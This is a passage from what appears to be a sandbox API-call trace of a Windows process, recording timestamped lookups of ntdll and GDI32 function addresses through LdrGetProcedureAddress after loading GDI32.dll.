BaseAddress=0x76fa0000, Name="_allshr", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd8990) returned 0x0 [0199.331] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlUnicodeToMultiByteSize" | out: DestinationString="RtlUnicodeToMultiByteSize") [0199.331] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlUnicodeToMultiByteSize", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76ffc9bc) returned 0x0 [0199.331] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_allmul" | out: DestinationString="_allmul") [0199.331] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_allmul", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe2760) returned 0x0 [0199.331] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtCallbackReturn" | out: DestinationString="NtCallbackReturn") [0199.331] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtCallbackReturn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbf8c8) returned 0x0 [0199.331] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_chkstk" | out: DestinationString="_chkstk") [0199.331] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_chkstk", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fdad68) returned 0x0 [0199.332] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="memmove" | out: DestinationString="memmove") [0199.332] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="memmove", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd8f50) returned 0x0 [0199.332] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtQueryInformationToken" | out: DestinationString="NtQueryInformationToken") [0199.332] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtQueryInformationToken", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfb98) returned 0x0 [0199.332] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtOpenProcessToken" | out: DestinationString="NtOpenProcessToken") [0199.332] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtOpenProcessToken", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc10b0) returned 0x0 [0199.332] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtOpenThreadToken" | out: DestinationString="NtOpenThreadToken") [0199.332] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtOpenThreadToken", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfbe0) returned 0x0 [0199.332] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlNtStatusToDosError" | out: DestinationString="RtlNtStatusToDosError") [0199.333] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlNtStatusToDosError", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd61ed) returned 0x0 [0199.333] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CsrClientCallServer" | out: DestinationString="CsrClientCallServer") [0199.333] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="CsrClientCallServer", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704caff) returned 0x0 [0199.333] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CsrFreeCaptureBuffer" | out: DestinationString="CsrFreeCaptureBuffer") [0199.333] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="CsrFreeCaptureBuffer", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704cb1f) returned 0x0 [0199.333] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CsrCaptureMessageBuffer" | out: DestinationString="CsrCaptureMessageBuffer") [0199.333] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="CsrCaptureMessageBuffer", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704cb3f) returned 0x0 [0199.333] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CsrAllocateCaptureBuffer" | out: DestinationString="CsrAllocateCaptureBuffer") [0199.333] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="CsrAllocateCaptureBuffer", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704cb0f) returned 0x0 [0199.333] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlFreeSid" | out: DestinationString="RtlFreeSid") [0199.334] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlFreeSid", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd93b2) returned 0x0 [0199.334] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlAllocateAndInitializeSid" | out: DestinationString="RtlAllocateAndInitializeSid") [0199.334] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlAllocateAndInitializeSid", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd93e2) returned 0x0 [0199.334] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CsrAllocateMessagePointer" | out: DestinationString="CsrAllocateMessagePointer") [0199.334] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="CsrAllocateMessagePointer", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704cb2f) returned 0x0 [0199.334] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlReAllocateHeap" | out: DestinationString="RtlReAllocateHeap") [0199.334] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlReAllocateHeap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe1f6e) returned 0x0 [0199.334] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlRunDecodeUnicodeString" | out: DestinationString="RtlRunDecodeUnicodeString") [0199.335] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlRunDecodeUnicodeString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77051ec8) returned 0x0 [0199.335] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlRunEncodeUnicodeString" | out: DestinationString="RtlRunEncodeUnicodeString") [0199.335] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlRunEncodeUnicodeString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77051e4e) returned 0x0 [0199.335] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlGetThreadLangIdByIndex" | out: DestinationString="RtlGetThreadLangIdByIndex") [0199.335] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlGetThreadLangIdByIndex", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77058b58) returned 0x0 [0199.335] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlSizeHeap" | out: DestinationString="RtlSizeHeap") [0199.335] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlSizeHeap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd3002) returned 0x0 [0199.335] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="strcpy_s" | out: DestinationString="strcpy_s") [0199.335] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="strcpy_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x770059cd) returned 0x0 [0199.336] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="sscanf_s" | out: DestinationString="sscanf_s") [0199.336] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="sscanf_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x770786cc) returned 0x0 [0199.336] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="strrchr" | out: DestinationString="strrchr") [0199.336] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="strrchr", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7701c700) returned 0x0 [0199.336] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlIsNameLegalDOS8Dot3" | out: DestinationString="RtlIsNameLegalDOS8Dot3") [0199.336] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlIsNameLegalDOS8Dot3", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x770645da) returned 0x0 [0199.336] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcsncat_s" | out: DestinationString="wcsncat_s") [0199.337] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcsncat_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fee478) returned 0x0 [0199.337] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtRaiseHardError" | out: DestinationString="NtRaiseHardError") [0199.337] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtRaiseHardError", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc15f4) returned 0x0 [0199.337] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlMultiByteToUnicodeSize" | out: DestinationString="RtlMultiByteToUnicodeSize") [0199.337] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlMultiByteToUnicodeSize", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7701a0da) returned 0x0 [0199.337] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlCheckRegistryKey" | out: DestinationString="RtlCheckRegistryKey") [0199.338] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlCheckRegistryKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77057f24) returned 0x0 [0199.338] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="LdrFlushAlternateResourceModules" | out: DestinationString="LdrFlushAlternateResourceModules") [0199.338] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="LdrFlushAlternateResourceModules", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7704df5b) returned 0x0 [0199.338] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="qsort" | out: DestinationString="qsort") [0199.338] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="qsort", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77075191) returned 0x0 [0199.338] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="iswspace" | out: DestinationString="iswspace") [0199.338] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="iswspace", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x770750d8) returned 0x0 [0199.338] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcsncpy_s" | out: DestinationString="wcsncpy_s") [0199.338] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcsncpy_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7700e4de) returned 0x0 [0199.338] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcsrchr" | out: DestinationString="wcsrchr") [0199.339] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcsrchr", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd7ee9) returned 0x0 [0199.339] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_alldiv" | out: DestinationString="_alldiv") [0199.339] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_alldiv", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77018d00) returned 0x0 [0199.339] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_wtoi" | out: DestinationString="_wtoi") [0199.339] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_wtoi", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7701aa8d) returned 0x0 [0199.339] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_aulldvrm" | out: DestinationString="_aulldvrm") [0199.339] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_aulldvrm", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fcf880) returned 0x0 [0199.339] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NlsAnsiCodePage" | out: DestinationString="NlsAnsiCodePage") [0199.340] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NlsAnsiCodePage", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x770a0010) returned 0x0 [0199.340] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlImageNtHeader" | out: DestinationString="RtlImageNtHeader") [0199.340] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlImageNtHeader", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd3164) returned 0x0 [0199.340] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlSetLastWin32Error" | out: DestinationString="RtlSetLastWin32Error") [0199.340] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlSetLastWin32Error", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc22ef) returned 0x0 [0199.340] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlUnwind" | out: DestinationString="RtlUnwind") [0199.340] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlUnwind", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe6d39) returned 0x0 [0199.340] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtClose" | out: DestinationString="NtClose") [0199.340] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtClose", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbf9d0) returned 0x0 [0199.340] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtQueryValueKey" | out: DestinationString="NtQueryValueKey") [0199.341] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtQueryValueKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfa98) returned 0x0 [0199.341] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="swprintf_s" | out: DestinationString="swprintf_s") [0199.341] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="swprintf_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x7700290f) returned 0x0 [0199.341] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlInitUnicodeString" | out: DestinationString="RtlInitUnicodeString") [0199.341] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlInitUnicodeString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce208) returned 0x0 [0199.341] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlUnicodeStringToInteger" | out: DestinationString="RtlUnicodeStringToInteger") [0199.341] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlUnicodeStringToInteger", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76ffcb1e) returned 0x0 [0199.341] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x326f984, Source="GDI32.dll" | out: Destination="GDI32.dll") returned 1 [0199.341] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="GDI32.dll", BaseAddress=0x326f9a4 | out: BaseAddress=0x326f9a4*=0x766b0000) returned 0x0 [0199.342] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetClipRgn" | out: DestinationString="GetClipRgn") [0199.342] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetClipRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8a43) returned 0x0 [0199.342] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="ExtSelectClipRgn" | out: DestinationString="ExtSelectClipRgn") [0199.342] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="ExtSelectClipRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c879f) returned 0x0 [0199.342] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetHFONT" | out: DestinationString="GetHFONT") [0199.342] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetHFONT", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8345) returned 0x0 [0199.342] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetMapMode" | out: DestinationString="GetMapMode") [0199.343] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetMapMode", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8396) returned 0x0 [0199.343] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetGraphicsMode" | out: DestinationString="SetGraphicsMode") [0199.343] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetGraphicsMode", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cc182) returned 0x0 [0199.343] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetClipBox" | out: DestinationString="GetClipBox") [0199.343] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetClipBox", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766caf9f) returned 0x0 [0199.343] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateRectRgn" | out: DestinationString="CreateRectRgn") [0199.343] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateRectRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c77cf) returned 0x0 [0199.343] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateRectRgnIndirect" | out: DestinationString="CreateRectRgnIndirect") [0199.344] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateRectRgnIndirect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca764) returned 0x0 [0199.344] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetLayout" | out: DestinationString="SetLayout") [0199.344] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetLayout", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb2bb) returned 0x0 [0199.344] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetBoundsRect" | out: DestinationString="GetBoundsRect") [0199.344] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetBoundsRect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cc0c3) returned 0x0 [0199.344] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="ExcludeClipRect" | out: DestinationString="ExcludeClipRect") [0199.345] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="ExcludeClipRect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca066) returned 0x0 [0199.345] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="PlayEnhMetaFile" | out: DestinationString="PlayEnhMetaFile") [0199.345] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="PlayEnhMetaFile", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766dc8a2) returned 0x0 [0199.345] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="Ellipse" | out: DestinationString="Ellipse") [0199.345] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="Ellipse", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766f4492) returned 0x0 [0199.345] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateEllipticRgn" | out: DestinationString="CreateEllipticRgn") [0199.345] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateEllipticRgn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766f36ff) returned 0x0 [0199.345] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GdiFixUpHandle" | out: DestinationString="GdiFixUpHandle") [0199.345] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GdiFixUpHandle", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c799e) returned 0x0 [0199.346] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreatePen" | out: DestinationString="CreatePen") [0199.346] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreatePen", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cba4f) returned 0x0 [0199.346] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="Rectangle" | out: DestinationString="Rectangle") [0199.346] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="Rectangle", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ca53a) returned 0x0 [0199.346] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextCharacterExtra" | out: DestinationString="GetTextCharacterExtra") [0199.346] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextCharacterExtra", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766d1671) returned 0x0 [0199.346] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetTextCharacterExtra" | out: DestinationString="SetTextCharacterExtra") [0199.346] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetTextCharacterExtra", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766d1dd9) returned 0x0 [0199.346] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCurrentObject" | out: DestinationString="GetCurrentObject") [0199.347] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetCurrentObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c6bad) returned 0x0 [0199.347] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetViewportOrgEx" | out: DestinationString="GetViewportOrgEx") [0199.347] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetViewportOrgEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c8659) returned 0x0 [0199.347] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetViewportOrgEx" | out: DestinationString="SetViewportOrgEx") [0199.347] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetViewportOrgEx", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c86cc) returned 0x0 [0199.347] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="PolyPatBlt" | out: DestinationString="PolyPatBlt") [0199.347] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="PolyPatBlt", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c84db) returned 0x0 [0199.347] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreateBrushIndirect" | out: DestinationString="CreateBrushIndirect") [0199.348] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreateBrushIndirect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb385) returned 0x0 [0199.348] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetBoundsRect" | out: DestinationString="SetBoundsRect") [0199.348] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetBoundsRect", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cc0a1) returned 0x0 [0199.348] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CopyEnhMetaFileW" | out: DestinationString="CopyEnhMetaFileW") [0199.348] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CopyEnhMetaFileW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766fd9dc) returned 0x0 [0199.348] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CopyMetaFileW" | out: DestinationString="CopyMetaFileW") [0199.348] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CopyMetaFileW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766d960c) returned 0x0 [0199.348] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetPaletteEntries" | out: DestinationString="GetPaletteEntries") [0199.348] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetPaletteEntries", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ccebf) returned 0x0 [0199.349] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="CreatePalette" | out: DestinationString="CreatePalette") [0199.349] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="CreatePalette", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c795a) returned 0x0 [0199.349] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="SetPaletteEntries" | out: DestinationString="SetPaletteEntries") [0199.349] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="SetPaletteEntries", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766f535b) returned 0x0 [0199.349] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetPixel" | out: DestinationString="GetPixel") [0199.349] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetPixel", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766ccbfb) returned 0x0 [0199.349] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="ExtTextOutA" | out: DestinationString="ExtTextOutA") [0199.349] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="ExtTextOutA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cdce4) returned 0x0 [0199.349] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextCharsetInfo" | out: DestinationString="GetTextCharsetInfo") [0199.350] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextCharsetInfo", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9de9) returned 0x0 [0199.350] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="QueryFontAssocStatus" | out: DestinationString="QueryFontAssocStatus") [0199.350] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="QueryFontAssocStatus", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb5d5) returned 0x0 [0199.350] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCharWidthInfo" | out: DestinationString="GetCharWidthInfo") [0199.350] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetCharWidthInfo", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cb5e0) returned 0x0 [0199.350] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCharWidthA" | out: DestinationString="GetCharWidthA") [0199.350] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetCharWidthA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766cdd11) returned 0x0 [0199.350] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetTextFaceW" | out: DestinationString="GetTextFaceW") [0199.350] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetTextFaceW", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766c9936) returned 0x0 [0199.350] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="GetCharABCWidthsA" | out: DestinationString="GetCharABCWidthsA") [0199.351] LdrGetProcedureAddress (in: BaseAddress=0x766b0000, Name="GetCharABCWidthsA", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x766e937f) returned 0x0 [0199.351] RtlInitAnsiString (in: 